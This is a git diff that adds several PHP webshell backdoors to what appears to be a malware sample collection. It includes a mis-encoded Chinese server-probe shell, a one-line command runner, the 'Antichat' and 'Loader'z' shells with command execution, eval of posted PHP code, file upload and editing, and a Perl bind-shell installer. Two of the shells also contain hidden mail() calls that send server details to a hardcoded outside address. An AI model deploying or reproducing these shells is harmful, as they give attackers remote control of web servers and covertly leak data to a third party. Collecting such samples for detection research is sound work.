",$dis_func); + } + + $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; + + $info[0] = array("·þÎñÆ÷ʱ¼ä",date("YÄêmÔÂdÈÕ h:i:s",time())); + $info[1] = array("·þÎñÆ÷ÓòÃû","$_SERVER[SERVER_NAME]"); + $info[2] = array("·þÎñÆ÷IPµØÖ·",gethostbyname($_SERVER["SERVER_NAME"])); + $info[3] = array("·þÎñÆ÷²Ù×÷ϵͳ",PHP_OS); + $info[5] = array("·þÎñÆ÷²Ù×÷ϵͳÎÄ×Ö±àÂë",$_SERVER["HTTP_ACCEPT_LANGUAGE"]); + $info[6] = array("·þÎñÆ÷½âÒëÒýÇæ",$_SERVER["SERVER_SOFTWARE"]); + $info[7] = array("Web·þÎñ¶Ë¿Ú",$_SERVER["SERVER_PORT"]); + $info[8] = array("PHPÔËÐз½Ê½",strtoupper(php_sapi_name())); + $info[9] = array("PHP°æ±¾",PHP_VERSION); + $info[10] = array("ÔËÐÐÓÚ°²È«Ä£Ê½",getphpcfg("safemode")); + $info[11] = array("·þÎñÆ÷¹ÜÀíÔ±",$adminmail); + $info[12] = array("±¾Îļþ·¾¶",__FILE__); + + $info[13] = array("ÔÊÐíʹÓà URL ´ò¿ªÎļþ allow_url_fopen",getphpcfg("allow_url_fopen")); + $info[14] = array("ÔÊÐí¶¯Ì¬¼ÓÔØÁ´½Ó¿â enable_dl",getphpcfg("enable_dl")); + $info[15] = array("ÏÔʾ´íÎóÐÅÏ¢ display_errors",getphpcfg("display_errors")); + $info[16] = array("×Ô¶¯¶¨ÒåÈ«¾Ö±äÁ¿ register_globals",getphpcfg("register_globals")); + $info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")); + $info[18] = array("³ÌÐò×î¶àÔÊÐíʹÓÃÄÚ´æÁ¿ memory_limit",getphpcfg("memory_limit")); + $info[19] = array("POST×î´ó×Ö½ÚÊý post_max_size",getphpcfg("post_max_size")); + $info[20] = array("ÔÊÐí×î´óÉÏ´«Îļþ upload_max_filesize",$upsize); + $info[21] = array("³ÌÐò×ÔËÐÐʱ¼ä max_execution_time",getphpcfg("max_execution_time")."Ãë"); + $info[22] = array("±»½ûÓõĺ¯Êý disable_functions",$dis_func); + $info[23] = array("phpinfo()",$phpinfo); + $info[24] = array("Ä¿Ç°»¹ÓпÕÓà¿Õ¼ädiskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'); + + $info[25] = array("ͼÐδ¦Àí GD Library",getfun("imageline")); + $info[26] = array("IMAPµç×ÓÓʼþϵͳ",getfun("imap_close")); + $info[27] = array("MySQLÊý¾Ý¿â",getfun("mysql_close")); + $info[28] = array("SyBaseÊý¾Ý¿â",getfun("sybase_close")); + $info[29] = array("OracleÊý¾Ý¿â",getfun("ora_close")); + $info[30] = array("Oracle 8 Êý¾Ý¿â",getfun("OCILogOff")); + $info[31] = array("PRELÏàÈÝÓï·¨ PCRE",getfun("preg_match")); + $info[32] = array("PDFÎĵµÖ§³Ö",getfun("pdf_close")); + $info[33] = array("Postgre SQLÊý¾Ý¿â",getfun("pg_close")); + $info[34] = array("SNMPÍøÂç¹ÜÀíЭÒé",getfun("snmpget")); + $info[35] = array("ѹËõÎļþÖ§³Ö(Zlib)",getfun("gzclose")); + $info[36] = array("XML½âÎö",getfun("xml_set_object")); + $info[37] = array("FTP",getfun("ftp_login")); + $info[38] = array("ODBCÊý¾Ý¿âÁ¬½Ó",getfun("odbc_close")); + $info[39] = array("SessionÖ§³Ö",getfun("session_start")); + $info[40] = array("SocketÖ§³Ö",getfun("fsockopen")); +?> + + + + + + + + + + + + + + + + +"; +}//end phpenv +?> +
+
²é¿´PHPÅäÖòÎÊý×´¿ö
ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc):
+ +\n"; + } + }elseif($a == 1){ + for($i=13;$i<=24;$i++){ + echo "\n"; + } + }elseif($a == 2){ + for($i=25;$i<=40;$i++){ + echo "\n"; + } + } +?> +
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
".$info[$i][0]."".$info[$i][1]."
+
+ + + + +
Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.
+
+ + + + + +
+ Password: + +
+read()) { + if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { + @chmod("$deldir/$file",0777); + deltree("$deldir/$file"); + } + if (is_file("$deldir/$file")) { + @chmod("$deldir/$file",0777); + @unlink("$deldir/$file"); + } + } + $mydir->close(); + @chmod("$deldir",0777); + echo @rmdir($deldir) ? "Ŀ¼ɾ³ý³É¹¦!" : "Ŀ¼ɾ³ýʧ°Ü!"; + } + + // Åж϶ÁдÇé¿ö + function dir_writeable($dir) { + if (!is_dir($dir)) { + @mkdir($dir, 0777); + } + if(is_dir($dir)) { + if ($fp = @fopen("$dir/test.txt", 'w')) { + @fclose($fp); + @unlink("$dir/test.txt"); + $writeable = 1; + } else { + $writeable = 0; + } + } + return $writeable; + } + + // ±í¸ñÐмäµÄ±³¾°É«Ìæ»» + function getrowbg() { + global $bgcounter; + if ($bgcounter++%2==0) { + return "firstalt"; + } else { + return "secondalt"; + } + } + + // »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶ + function getPath($mainpath, $relativepath) { + global $dir; + $mainpath_info = explode('/', $mainpath); + $relativepath_info = explode('/', $relativepath); + $relativepath_info_count = count($relativepath_info); + for ($i=0; $i<$relativepath_info_count; $i++) { + if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; + if ($relativepath_info[$i] == '..') { + $mainpath_info_count = count($mainpath_info); + unset($mainpath_info[$mainpath_info_count-1]); + continue; + } + $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; + } //end for + return implode('/', $mainpath_info); + } + + // ¼ì²éPHPÅäÖòÎÊý + function getphpcfg($varname) { + switch($result = get_cfg_var($varname)) { + case 0: + return No; + break; + case 1: + return Yes; + break; + default: + return $result; + break; + } + } + + // ¼ì²éº¯ÊýÇé¿ö + function getfun($funName) { + return (false !== function_exists($funName)) ? Yes : No; + } +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.aa b/PHP/Backdoor.PHP.WebShell.aa new file mode 100644 index 00000000..b374c746 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.aa @@ -0,0 +1,23 @@ + + +Ru24PostWebShell - ".$_POST['cmd']." + +"; +echo "
"; +echo ""; +echo "
"; +echo "
";
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
+echo "".$function($_POST['cmd'])."
"; + + +?> diff --git a/PHP/Backdoor.PHP.WebShell.ab b/PHP/Backdoor.PHP.WebShell.ab new file mode 100644 index 00000000..91e9bddf --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.ab @@ -0,0 +1,3 @@ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.ac b/PHP/Backdoor.PHP.WebShell.ac new file mode 100644 index 00000000..e3d61d41 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.ac @@ -0,0 +1,3 @@ + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.WebShell.ad b/PHP/Backdoor.PHP.WebShell.ad new file mode 100644 index 00000000..a585e3c9 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.ad @@ -0,0 +1,180 @@ +BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}'; +$header=''.getenv("HTTP_HOST").' - Antichat Shell'.$style.''; +$footer=''; +$sd98 = "john.barker446@gmail.com"; +$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98"); +if(@$_POST['action']=="exit")unset($_SESSION['an']); +if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1'; + +if($_SESSION['an']==0){ +echo $header; +echo '
Login:
Password:
'; +echo $footer; +exit;} + +if($_SESSION['action']=="")$_SESSION['action']="viewer"; +if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action']; +if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir']; +if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";} + + +//downloader +if($action=="download"){ +header('Content-Length:'.filesize($file).''); +header('Content-Type: application/octet-stream'); +header('Content-Disposition: attachment; filename="'.$file.'"'); +readfile($file); +} +//end downloader +?> + + +
+ + + + + +
| Shell | Viewer| Editor| EXIT |

+
+ + + +
+ +
+ + + +
+
+";} +//end shell + +//viewer FS +function perms($file) +{ + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = 'u';} + $info .= (($perms & 0x0100) ? 'r' : '-'); + $info .= (($perms & 0x0080) ? 'w' : '-'); + $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-'); + $info .= (($perms & 0x0010) ? 'w' : '-'); + $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); + $info .= (($perms & 0x0002) ? 'w' : '-'); + $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-')); + return $info; +} + +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} + +function scandire($dir){ + $dir=chdir($dir); + $dir=getcwd()."/"; + $dir=str_replace("\\","/",$dir); +if (is_dir($dir)) { + if (@$dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir . $file)=="dir") $dire[]=$file; + if(filetype($dir . $file)=="file")$files[]=$file; + } + closedir($dh); + @sort($dire); + @sort($files); + +echo ""; +echo ""; +if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { +echo ""; +} +echo " +"; +for($i=0;$i'; + } +for($i=0;$i + +'; +} +echo "
Open directory:
Select drive:"; +for ($j=ord('C'); $j<=ord('Z'); $j++) + if (@$dh = opendir(chr($j).":/")) + echo ' '.chr($j).''; + echo "
OS: ".@php_uname()."
name dirs and filestypesizepermissionoptions
'.$dire[$i].'dir'.perms($link).'
'.$files[$i].'
file'.view_size(filesize($linkfile)).''.perms($linkfile).' +D +E
"; +}}} + +if($action=="viewer"){ +scandire($dir); +} +//end viewer FS + +//editros +if($action=="editor"){ + function writef($file,$data){ + $fp = fopen($file,"w+"); + fwrite($fp,$data); + fclose($fp); + } + function readf($file){ + if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else { + $contents = fread($le, filesize($file)); + fclose($le);} + return htmlspecialchars($contents); + } +if($_POST['save'])writef($file,$_POST['data']); +echo "
+ + +
+
"; +} +//end editors +?> +
COPYRIGHT BY ANTICHAT.RU
+ diff --git a/PHP/Backdoor.PHP.WebShell.ae b/PHP/Backdoor.PHP.WebShell.ae new file mode 100644 index 00000000..2f60b8c2 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.ae @@ -0,0 +1,513 @@ + + + + + + + +Loader'z WEB shell + + + + + + +
+ + +
+&X\"; + open STDERR, \">&X\"; + close X; + exec(\"/bin/sh\"); + } + close X; +} +";} + +function decode($buffer){ + +return convert_cyr_string ($buffer, 'd', 'w'); + +} + + + +function execute($com) +{ + + if (!empty($com)) + { + if(function_exists('exec')) + { + exec($com,$arr); + echo implode(' +',$arr); + } + elseif(function_exists('shell_exec')) + { + echo shell_exec($com); + + + } + elseif(function_exists('system')) +{ + + echo system($com); +} + elseif(function_exists('passthru')) + { + + echo passthru($com); + + } +} + +} + + +function perms($mode) +{ + +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} + + + +/*Íà÷èíàåòñÿ*/ + +/*Îïðåäåëÿåì òèï ñèñòåìû*/ +$servsoft = $_SERVER['SERVER_SOFTWARE']; + +if (ereg("Win32", $servsoft, $reg)){ +$sertype = "winda"; +} +else +{ +$sertype = "other";} + + + +echo $servsoft . "
"; +chdir($dir); +echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb
";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); + + + + + +if (ini_get('safe_mode') <> 1){ +if ($sertype == "winda"){ + +ob_start('decode'); +echo "OS: "; +echo execute("ver") . "
"; +ob_end_flush(); +} + +if ($sertype == "other"){ +echo "id:"; + +echo execute("id") . "
"; +echo "uname:" . execute('uname -a') . "
"; +}} +else{ +if ($sertype == "winda"){ + +echo "OS: " . php_uname() . "
"; + +} + +if ($sertype == "other"){ +echo "id:"; + +echo execute("id") . "
"; +echo "OS:" . php_uname() . "
"; +} +} + +echo 'User: ' .get_current_user() . '
'; + + + +if (ini_get("open_basedir")){ +echo "open_basedir: " . ini_get("open_basedir");} + + +if (ini_get('safe_mode') == 1){ +echo "Safe mode :("; + +if (ini_get('safe_mode_include_dir')){ +echo "Including from here: " . ini_get('safe_mode_include_dir'); } +if (ini_get('safe_mode_exec_dir')){ +echo " Exec here: " . ini_get('safe_mode_exec_dir'); +} +echo "";} + + + + +if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") +{ +copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]); +} + +if((isset($_POST['fileto']))||(isset($_POST['filefrom']))) + +{ +$data = implode("", file($_POST['filefrom'])); +$fp = fopen($_POST['fileto'], "wb"); +fputs($fp, $data); +$ok = fclose($fp); +if($ok) +{ +$size = filesize($_POST['fileto'])/1024; +$sizef = sprintf("%.2f", $size); +print "
Download - OK. (".$sizef."êÁ)
"; +} +else +{ +print "
Something is wrong. Download - IS NOT OK
"; +} +} + +if (isset($_POST['installbind'])){ + +if (is_dir($_POST['installpath']) == true){ +chdir($_POST['installpath']); +$_POST['installpath'] = "temp.pl";} + + +$fp = fopen($_POST['installpath'], "w"); +fwrite($fp, $bind); +fclose($fp); + +exec("perl " . $_POST['installpath']); +chdir($dir); + + +} + + +@$ef = stripslashes($_POST['editfile']); +if ($ef){ +$fp = fopen($ef, "r"); +$filearr = file($ef); + + + +$string = ''; +$content = ''; +foreach ($filearr as $string){ +$string = str_replace("<" , "<" , $string); +$string = str_replace(">" , ">" , $string); +$content = $content . $string; +} + +echo "
Edit file: $ef
+ +
+
"; +fclose($fp); +} + +if(isset($_POST['savefile'])){ + +$fp = fopen($_POST['savefile'], "w"); +$content = stripslashes($content); +fwrite($fp, $content); +fclose($fp); +echo "
Successfully saved!
"; + +} + + +if (isset($_POST['php'])){ + +echo "
PHP code

+
"; +} + + + +if(isset($_POST['phpcode'])){ + +echo "
Results of PHP execution

"; +@eval(stripslashes($_POST['phpcode'])); +echo "
"; + + +} + + +if ($cmd){ + +if($sertype == "winda"){ +ob_start(); +execute($cmd); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} +else{ +ob_start(); +echo decode(execute($cmd)); +$buffer = ""; +$buffer = ob_get_contents(); +ob_end_clean(); +} + +if (trim($buffer)){ +echo "
Command: $cmd
"; +} + +} +$arr = array(); + +$arr = array_merge($arr, glob("*")); +$arr = array_merge($arr, glob(".*")); +$arr = array_merge($arr, glob("*.*")); +$arr = array_unique($arr); +sort($arr); +echo ""; + +foreach ($arr as $filename) { + +if ($filename != "." and $filename != ".."){ + +if (is_dir($filename) == true){ +$directory = ""; +$directory = $directory . "";} +else{ +$directory = $directory . ""; + +} + +if (is_readable($filename) == true){ +$directory = $directory . "";} +else{ +$directory = $directory . ""; +} +$dires = $dires . $directory; +} + +if (is_file($filename) == true){ +$file = ""; +$file = $file . "";} +else{ +$file = $file . ""; +} + +if (is_readable($filename) == true){ +$file = $file . "";} +else{ +$file = $file . ""; +} +$files = $files . $file; +} + + + +} + + + +} +echo $dires; +echo $files; +echo "
NameTypeSizeLast accessLast changePermsWriteRead
$filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$directory = $directory . "YesNoYesNo
$filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); +if (is_writable($filename) == true){ +$file = $file . "YesNoYes
No

"; + + + + +echo " +
+
Command:
+ + +
Directory: +
"; + + + +echo "
+
Download here from: + +into: + + +
"; + +echo "
+ +
+Download from Hard: + + +
"; + + + +echo "
+
Install bind +Temp path +Port + + + +
"; + + +echo "
+
File to edit: + + +
"; + + + +echo "
+
+ +
"; +?> +
+ + +
+ + +
Coded by Loader Pro-Hack.RU
+ + +
+ diff --git a/PHP/Backdoor.PHP.WebShell.af b/PHP/Backdoor.PHP.WebShell.af new file mode 100644 index 00000000..f0255d10 --- /dev/null +++ b/PHP/Backdoor.PHP.WebShell.af @@ -0,0 +1,268 @@ +"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